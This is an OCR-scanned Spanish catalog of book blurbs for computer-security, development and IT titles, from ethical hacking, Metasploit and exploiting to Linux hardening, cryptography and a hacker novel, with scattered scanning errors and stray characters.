proteger  sus  comunicaciones  moviles. 
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La  Administracion  Espanola  lidera  un  encomiable  esfuerzo  hacia 
el  Desarrollo  de  la  Sociedad  de  la  Tnformacion  en  Espana,  asi 
como  en  el  uso  optimo  de  las  tecnologias  de  la  Informacion  en  pro 
de  una  prestacion  de  servicios  mas  eficiente  hacia  los  ciudadanos. 
Aunque  este  tipo  de  contenidos  no  siempre  son  faciles  de  tratar 
sin  caer  en  un  excesivo  dogmatismo.  si  es  cierto  que  en  el  marco 
de  la  Ley  11/2007  del  22  de  Junio,  de  acceso  electronico  de  los 
ciudadanos  a  los  Servicios  Publicos,  se  anuncio  la  creacion  de  los 
Esquemas  Nacionales  de  Interoperabilidad  y  de  Seguridad  con  la 
mision  de  garantizar  un  derecho  ciudadano.  lo  que  sin  duda  es  un 
reto  y  una  responsabilidad  de  primera  magnitud.  Este  manual  sirve 
para  facilitar  a  los  responsables  de  seguridad  el  cumplimiento  de 
los  aspectos  tecnologicos  derivados  del  cumplimiento  del  ENS. 


No  es  de  extranar  que  los  programas  contengan  fallos,  errores. 
que.  bajo  determinadas  circunstancias  los  hagan  funcionar  dc 
Forma  extraha.  Que  los  conviertan  en  algo  para  lo  que  no  estaban 
disenados.  Aqui  es  donde  entran  en  juego  los  posibles  atacantes. 
Pen  testers,  auditores,...  y  ciberdelincuentes.  Para  la  organizacion. 
mejor  que  sea  uno  de  los  primeros  que  uno  de  los  ultimos.  Pero  para 
la  aplicacion,  que  no  entra  en  valorar  intenciones,  no  hay  diferencia 
entre  el  los.  Simplemente.  son  usuarios  que  hablan  un  extrano 
idioma  en  que  los  errores  se  denominan  “vulnerabilidades”,  y  una 
aplicacion  defectuosa  puede  terminar  convirtiendose,  por  ejemplo. 
en  una  interfaz  dc  usuario  que  le  permita  interactuar  directamente 
con  la  base  de  datos.  Y  basta  con  un  unico  error. 


Las  redes  dc  datos  IP  hace  mucho  tiempo  que  gobieman  nuestras 
sociedades.  Empresas.  gobiernos  y  sistemas  de  interaccion 
social  se  basan  en  redes  TCP/IP.  Sin  embargo,  estas  redes  tienen 
vulnerabilidades  que  pueden  ser  aprovechadas  por  un  atacante 
para  robar  contrasehas,  capturar  conversacioncs  de  voz,  mensajes 
de  correo  electronico  o  informacion  transmitida  desde  servidores. 
En  este  libro  se  analizan  como  funcionan  los  ataques  de  man  in 
the  middle  en  redes  IPv4  o  IPv6 ,  como  por  medio  de  estos  ataques 
se  puede  crakear  una  conexion  VPN  PPTP ,  robar  la  conexion  de 
un  usuario  al  Active  Directory *  o  como  suplantar  identificadores 
en  aplicaciones  para  conseguir  perpetrar  una  intrusion  ademas  del 
ataque  SLAAC  el  funcionamiento  de  las  tecnicas  ARP-Spooftng , 
Neighbor  Spoofing  en  IPv6 ,  etcetera. 
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Desarrollo  de  aplicaciones  iOS 
para  iPhone  &  iPad:  Essentials 

luma  Mfsurl  Aauaro  SAtictel 


BxVuRD 


Hoy  dia  es  innegable  el  imparable  crecimiento  que  han  tenido  las 
tecnologias  de  los  dispositivos  moviles  en  los  ultimos  anos.  El 
numero  de  smartphones ,  tablets ,  etcetera  han  aumentado  de  manera 
exponencial.  Esto  ha  sido  asi,  hasta  tal  punto  que  actualmente  estos 
dispositivos  se  han  posicionado  como  tecnologias  de  maxima 
prioridad  para  muchas  empresas. 

Con  este  libro  se  pueden  adquirir  los  conocimientos  necesarios 
para  desarrollar  aplicaciones  en  iOS ,  guiando  al  lector  para  que 
aprenda  a  utilizar  las  herramientas  y  tecnicas  basicas  para  iniciarse 
en  el  mundo  iOS.  Se  pretende  sentar  unas  bases,  de  manera  que  al 
final izar  la  lectura,  el  lector  pueda  convertirse  en  desarrollador  iOS 
y  enfrentarse  a  proyectos  de  este  sistema  operativo  por  si  mismo. 


Windows  Server  2012 
para  IT  Pros 
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Windows  Server  2012 


Microsoft  Windows  Server  2012  ha  ilegado  con  novedades  cuyo 
objetivo  es  simplificar  las,  cada  vez  mas,  complejas  tareas  de 
los  administradores  y  profesionales  IT.  En  cl  presente  libro 
se  recogen  la  gran  mayoria  de  dichas  novedades  entre  las  que 
destacan  la  version  3.0  de  Ilyper- F,  el  servidor  de  virtualizacion 
de  Microsoft,  el  almacenamiento  con  su  nuevo  sistema  de  archivos 
y  sus  propicdades,  las  mejoras  y  nucvas  caracteristicas  de  Active 
Director y,  DNS  y  DHCP .  las  novedosas  formulas  de  despliegue 
eficiente,  la  ampliacion  y  mejora  de  la  linea  de  comandos 
Microsoft  Windows  Power  Shell,  y  como  no.  la  seguridad,  un  pilar 
basico  en  la  estructura  de  los  productos  Microsoft  La  idea  del  libro 
es  presentar  las  novedades  y  ahondar  en  los  conceptos  principales. 


Metasploit 

para  Pentestcrs 

I*  I d.oon 


qvVuRn 


La  seguridad  de  la  informacion  es  uno  de  los  mercados  en  auge  en 
la  Informatica  hoy  en  dia.  Los  gobiemos  y  empresas  valoran  sus 
activos  por  lo  que  deben  protegerlos  de  accesos  ilicitos  mediante 
el  uso  de  auditorias  que  proporcionen  un  status  de  seguridad  a 
nivel  organizativo.  El  pentesting  forma  parte  de  las  auditorias 
de  seguridad  y  proporciona  un  conjunto  de  pruebas  que  valoren 
el  estado  de  la  seguridad  de  la  organizacion  en  ciertas  fases. 
Metasploit  es  una  de  las  herramientas  mas  utilizadas  en  procesos 
de  pentesting  ya  que  contempla  distintas  fases  de  un  test  de 
intrusion.  Con  el  presente  libro  se  pretende  obtener  una  vision 
global  de  las  fases  en  las  que  Metasploit  puede  ofrecer  su  potencia 
y  flexibilidad  al  servicio  del  hacking  etico. 
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Microhistorias: 
anecdotas  y  curiosidades 
de  la  Informatica 

Rafael  T'CiMeaM 
trjnrJirn  tmt  llamlrea 


BxVuRD 


Hacker  Epico 


v4k 


BxVuRD 


^Sabias  que  Steve  Jobs  le  llevo  en  persona  un  ordenador  Macintosh 
a  Yoko  Ono  y  tambien  a  Mick  Jogger’?  <*, Y  que  Jay  Miner .  el  genio 
que  creo  el  Amiga  1000  tenia  una  perrita  que  tomaba  parte  en 
algunas  de  las  decisiones  de  diseho  de  este  ordenador?  que 
Xenix  fue  el  sistema  UNIX  mas  usado  en  los  80s  en  ordenadores  y 
que  era  propiedad  de  Microsoft ? 

Estas  son  solo  algunas  de  las  historias  y  anecdotas  que  encontraras 
en  este  libro  de  Microhistorias.  Una  parte  importante  de  las  cuales 
tienen  como  protagonista  a  los  iniembros  de  Microsoft  y  de  Apple. 

Historias  de  hackers,  phreakers,  programadores  y  disenadores 
cuya  eonstancia  y  sabiduria  nos  sirven  de  inspiracion  y  de  ejemplo 
para  nuestros  proyectos  de  hoy  en  dia. 


Angel  Rios,  auditor  de  una  empresa  puntera  en  el  sector  de 
la  seguridad  informatica  se  prepara  para  acudir  a  una  cita  con 
Yolanda,  antigua  compahera  de  clase  de  la  que  siempre  ha  estado 
enamorado.  Sin  embargo,  el  la  no  esta  interesada  en  iniciar  una 
relacion;  solo  quiere  que  le  ayude  a  descifrar  un  misterioso 
archivo.  Angel  se  ve  envuelto  en  una  intriga  que  complicara  su 
vida  y  lo  expondra  a  un  grave  peligro.  Unicamcnte  contara  con  sus 
conocimientos  de  hacking  y  el  apoyo  de  su  amigo  Marcos. 

Mezcla  de  novela  negra  y  manual  tecnico.  este  libro  aspira 
a  entretener  e  informar  a  partes  iguales  sobre  un  mundo  tan 
apasionante  como  es  el  de  la  seguridad  informatica.  Tecnicas  de 
hacking  web ,  sistemas  y  analisis  forense,  son  algunos  de  los  temas 
que  se  tratan  con  total  rigor  y  excelentemente  documenrados. 


La  evolucion  de  VOIP  ha  sido  considerable,  siendo  hoy  dia 
una  alternativa  muy  utilizada  como  solucion  unica  de  telefonia 
en  muchisimas  empresas.  Gracias  a  la  expansion  de  Internet  y 
a  las  redes  de  alta  velocidad,  llegara  un  momento  en  el  que  las 
Iineas  telefonicas  convencionales  sean  totalmente  sustituidas  por 
sistemas  de  VOIP,  dado  el  ahorro  economico  no  solo  en  llamadas 
sino  tambien  en  infraestructura. 

El  gran  problema  es  la  falta  de  concienciacion  en  seguridad.  Las 
empresas  aprenden  de  los  errores  a  base  de  pagar  elevadas  facturas 
y  a  causa  de  sufrir  intrusiones  en  sus  sistemas. 

Este  libro  muestra  como  hacer  un  test  de  penetracion  en  un  sistema 
de  VOIP  asi  como  las  herramientas  mas  utilizadas  para  atacarlo. 
repasando  ademas  los  fallos  de  configuracion  mas  comunes. 
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Wardog  y  el  mundo 
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Desarrollo  de  aplicaciones 
Android  seguras 


OvVnan 


Cifrado  de  las  comunlcacioncs  dlgitalcs 
De  la  dfra  clasicn  al  algoritmo  RSA 


^,1  tas  pensado  alguna  vez  por  que  cono  el  infomiatico  tiene  siempre 
esa  cara  dc  orco?  ^Por  que  siempre  esta  enfadado?  ^Por  que  no  se 
relaciona  con  la  gente  de  la  oficina? 

Yo  te  lo  digo:  por  tu  culpa.  Por  vuestra  culpa.  Por  las  burradas 
que  haceis.  Porque  no  os  podeis  estar  quietecitos.  no...  Porque  os 
creeis  que  el  infomiatico  tiene  la  solucion  para  todo. 

Pasa.  pasa,  y  enterate  de  que  pasa  por  la  cabeza  de  Wardog.  un 
administrador  de  sistemas  renegado,  con  afan  de  venganza,  con 
maldad  y  con  mala  hostia. 

Wardog y  el  mundo  es  el  producto  de  aiios  de  exposition  a  lasers 
dotados  de  estupidez  toxica,  de  mala  baba  destilada  y  acidez  de 
estomago.  Y  cafe  en  cantidades  malsanas. 


Actualmente,  el  mundo  de  las  aplicaciones  moviles  es  uno  de  los 
sectores  que  mas  dinero  mueve  en  el  mercado  de  la  informatica. 
Tener  conocimientos  de  programacion  en  estas  plataformas 
moviles  es  una  garantia  para  poder  encontrar  empleo  a  dia  de  hoy. 

"Desarrollo  de  aplicaciones  Android  seguras”  pretende  inculcar 
al  lector  una  base  solida  de  conocimientos  sobre  programacion 
en  la  plataforma  mdvil  con  mayor  cuota  de  mercado  del  mundo: 
Android .  Mediante  un  enfoque  eminentemente  practico,  el  libro 
guiara  al  lector  en  el  desarrollo  de  las  funcionalidades  mas 
dcmandadas  a  la  hora  de  desarrollar  una  aplicacion  movil.  Ademas 
se  pretende  educar  al  programador  e  introducirle  en  la  utilization 
de  tecnicas  de  diseno  que  modelen  aplicaciones  seguras,  en  la  parte 
dc  almaccnamiento  de  dates  y  en  la  parte  de  comunicaciones. 


Este  libro  se  dedica  especialmente  a  dos  paradigmas  de  la 
criptografia;  la  clasica  y  RSA.  Ambos  los  trata  a  fondo  con  el 
animo  de  convertirse  en  uno  de  los  documentos  mas  completos  en 
esta  tematica.  Para  conseguir  este  trabajo  el  texto  presentado  toma 
como  referenda  trabajo  previo  de  los  autores,  complcmcntandolo 
y  orientandolo  para  hacer  su  lectura  mas  asequible. 

El  tecnico  o  experto  en  seguridad  tendra  especial  interes  por  el 
sistema  RSA ,  aunque  le  venga  muy  bien  recordar  sus  inicios  en 
la  criptografia  como  texto  de  amena  lectura  y,  por  su  parte,  el 
lector  no  experto  en  estos  temas  criptologicos  pero  si  interesado, 
seguramente  le  atraiga  inicialmente  la  criptografia  clasica  por  su 
sencillez  y  sentido  historico. 
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Hardening  de  servidores  GNU/Linux 


»Access  Denied 


BjtVqaa 


Este  libro  trata  sobre  la  securizacion  de  entomos  Linux  siguiendo 
el  modelo  de  Delensa  en  Profundidad.  Es  decir,  diferenciando  la 
infraestructura  en  difcrcntcs  capas  que  deberan  ser  contlguradas 
de  forma  adecuada.  teniendo  como  principal  objetivo  la 
seguridad  global  que  proporcionaran.  Durante  el  transcurso  de 
esta  lectura  sc  ofrecen  bases  teoricas,  ejemplos  de  configuration 
y  funcionamiento.  ademas  de  buenas  practicas  para  tratar  de 
mantener  un  entomo  lo  mas  seguro  posible.  Sin  duda,  los  entornos 
basados  en  Linux  ofrecen  una  gran  flexibilidad  y  opciones.  por  lo 
que  se  ha  optado  por  trabajar  con  las  tecnologias  mas  cotnunes  y 
utilizadas.  En  definitiva.  este  libro  se  recomicnda  a  todos  aquellos 
que  deseen  reforzar  conceptos.  asi  como  para  los  que  necesiten  una 
base  desde  la  que  partir  a  la  hora  de  securizar  un  entomo  Linux. 


A  dia  de  hoy  se  ban  vendido  mas  de  500  millones  de  dispositivos 
iOS  y  aunque  la  seguridad  del  sistema  ha  mcjorado  con  cada 
version  todavia  se  pueden  encontrar  vulnerabilidades  a  explotar. 
Las  auditorias  de  seguridad  en  empresas  cada  vez  se  encuentran  con 
mas  dispositivos  iOS  entrc  sus  objetivos,  ya  que  los  empleados  los 
utilizan  en  sus  puestos  de  trabajo.  lo  que  hace  que  haya  que  pensar 
en  ellos  como  posibles  riesgos  de  seguridad.  En  este  libro  se  han 
juntado  un  nutrido  grupo  de  expertos  en  seguridad  en  la  materia 
para  recopilar  en  un  texto,  todas  las  formas  de  atacar  un  terminal 
iPhone  o  iPad  de  un  usuario  detereminado.  Tras  leer  este  libro.  si 
un  determinado  usuario  tiene  un  iPhone  o  un  iPad ’  seguro  que  al 
lector  se  le  ocurren  muchas  formas  de  conseguir  la  information 
que  en  el  se  guarde  o  de  controlar  lo  que  con  el  se  hace. 


El  exploiting  es  el  arte  de  convertir  una  vulnerabilidad  o  brecha 
de  seguridad  en  una  entrada  real  hacia  un  sistema  ajeno.  Cuando 
cientos  de  nolicias  en  la  red  hablan  sobre  "una  posible  ejecucion 
de  codigo  arbitrario”.  el  exploiter  es  aquella  persona  capaz  de 
desarrollar  todos  los  detalles  tecnicos  y  complejos  elemcntos 
que  hacen  realidad  dicha  afirmacion.  El  objetivo  es  provocar. 
a  travcs  de  un  fallo  de  programacion.  que  una  aplicacion  haga 
cosas  para  las  que  inicialmente  no  estaba  dischada.  pudiendo 
tomar  asi  posterior  control  sobre  un  sistema.  Desde  la  perspectiva 
de  un  hacker  etico ,  este  libro  le  brinda  todas  las  habilidades 
nccesarias  para  adcntrarse  en  el  mundo  del  exploiting  y  hacking 
de  aplicaciones  en  el  sistema  opcrativo  Linux.  Conviertase  en  un 
ninja  dc  la  seguridad,  aprcnda  el  KungFu  de  los  hackers. 
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La  herramienta  FOCA  es  una  ulilidad  pensada  por  pentesters  que  hacen 
penlesting.  Esto  hace  que  la  herramienta  este  llena  de  opciones  que  te 
seran  de  extremada  utilidad  si  vas  a  necesitar  hacer  una  audiiona  de 
seguridad  a  un  sitio  web  o  a  la  red  dc  una  empresa.  FOCA  esta  basada  en 
la  rccoleccion  dc  informacion  dc  fuentes  abiertas  OSINT ,  y  en  esta  ultima 
version  se  ponen  a  disposition  publica  todos  los  plugins  y  iunciones  que 
tenia  la  version  FRO. 

Adenitis,  en  esta  version,  es  posible  ampliar  la  funcionalidad  de  la 
hermiienta  y  extender  las  habilidades  de  FOCA  mediante  la  creacion  de 
plugins  personal  izados. 


Las  tecnicas  estcganograficas  se  inveniaron  hace  miles  de  anos.  en  la 
antigua  China  ya  sc  empleaban  para  enviar  mensajes  ocultos  entre 
personas.  Posteriormente,  ya  en  la  era  de  la  Guerra  Fria.  vinieron  los 
micropun  tos. 

Las  tecnicas  ban  ido  evolucionando  hasta  llegar  a  nuestros  dias,  en  los 
que  la  tecnologia  digital  ha  hecho  cambiar  radicalmente  todas  estas 
tecnicas  y  utilizar  los  contenidos  digitales  para  ocultar  los  mensajes. 
La  primera  ocultacion  se  baso  en  el  eambio  del  ultimo  bit,  pero 
rapidamente  se  desarrollaron  tecnicas  novedosas  que  descubrian  este 
tipo  de  comunicacion,  lo  que  las  inutilizo.  Lo  que  provoco  dedicar 
mas  esiuerzos  a  desarrollar  m^todos  que  utilizaran  operaciones  y 
transformadas  matematicas  sobre  los  contenidos  digitales  que  se  utilizan 
eomo  coberlura  de  los  mensajes 


LI  mundo  digital  y  el  mundo  fisico  estan  mas  unidos  cada  dia. 
Las  organizaciones  realizan  mas  gestiones  de  mancra  electroniea 
y  cada  dia  mas  amenazas  ponen  en  peligro  los  activos  dc  estas.  El 
mundo  esta  interconectado,  y  por  esta  razon  disciplinas  como  el 
hacking  etico  se  hacen  cada  vez  mas  necesarias  para  comprobar 
que  la  seguridad  de  los  activos  de  una  organizacion  es  la  apropiada. 

El  hacking  etico  es  el  arte  que  permite  llevar  a  cabo  acciones 
maliciosas  envueltas  en  la  etiea  profesional  de  un  hacker  que  ha 
sido  contratado  con  el  fin  de  encontrar  los  agujeros  de  seguridad 
de  los  sistemas  de  una  organizacion.  En  el  presente  libro  puedes 
encontrar  procedimientos,  procesos,  vectores  dc  ataque,  tecnicas 
de  hacking,  teoria  y  practica  de  este  arte. 


Libtvs  pitblicados 


En  este  libro  no  solamente  vas  a  encontrar  contenido  relacionado 
con  las  librerias  y  herramientas  disponibles  en  Python  para 
ejecutar  actividades  de  pentesting,  sino  que  tambien  se  habla  sobre 
conceptos  y  tecnicas  de  hacking  en  entornos  de  red,  elevacion 
de  privilegios  en  sistemas  Windows  y  Linux,  herramientas 
para  analisis  forense,  tecnicas  para  recoleccion  de  informacion. 
tecnicas  y  herramientas  para  la  evasion  de  antivirus  e  incluso. 
uso  y  configuracion  avanzada  de  redes  anonimas  tales  como 
I2P  y  TOR.  Es  un  libro  escrito  especialmente  para  profesionales 
y  entusiastas  de  la  seguridad  informatica  que  se  sienten  a  gusto 
programando  y  afinando  sus  conocimientos.  Es  una  guia  para 
personas  que  les  gusta  saber  como  funcionan  las  cosas  y  que  se 
encuentran  en  un  proceso  continuo  de  aprendizaje. 


Python  es  un  lenguaje  de  programacion  muy  popular  entre 
pentesters  y  entusiastas  dc  la  seguridad  informatica.  pero  tambien 
entre  ciberdelincuentes  que  pretenden  detectar  y  cxplotar 
vulncrabilidades  durante  todo  cl  tiempo  que  sea  posible.  En 
este  documento  encontraras  una  guia  para  estudiar  algunas  de 
las  tecnicas  utilizadas  por  los  atacantes  en  Internet  para  cxplotar 
vulncrabilidades  y  cubrir  sus  rastros.  El  enfoque  de  este  libro 
es  completamente  tecnico  y  los  conceptos  teoricos  se  apoyan 
con  pruebas  de  concepto  utilizando  Python.  Los  conocimientos 
necesarios  para  comprometer  un  sistema  son  cada  vez  mayores 
y  aprender  sobre  seguridad  informatica  es  un  reto  que  muchos 
ciberdelincuentes  estan  afrontando  en  su  dia  a  dia. 


No,  esto  no  es  un  libro  de  hacking  pero  si  es  un  comic  basado 
en  el  libro  de  Hacker  Epico  donde  podras  vivir  una  aventura 
inolvidable.  Sujetos  investigados:  Angel  Rios,  auditor  seguridad 
informatica.  y  Marcos,  complice  y  amigo.  Hechos:  Tratamiento 
e  investigation  desautorizada  de  archivos  de  caracter  altamcntc 
confidencial.  Declaraciones:  Durante  el  pasado  fin  dc  semana,  a 
punto  de  terminar  un  provecto  muy  imporlantc,  tuve  una  cita  con 
Yolanda,  antigua  compafiera  de  clase;  me  ha  pedido  que  dcscifre 
un  misterioso  archivo,  ella  me  gusta.  no  supe  decirlc  que  no.  Ahora 
no  se  que  esta  pasando.  desde  que  descifre  el  archivo  nuestras 
vidas  estan  en  peligro,  debe  de  haber  una  trama  encubierta  de 
mentiras  detras  de  todo  esto  y  solo  dependo  de  mis  conocimientos 
de  hacking  para  hacer  publica  la  verdad. 


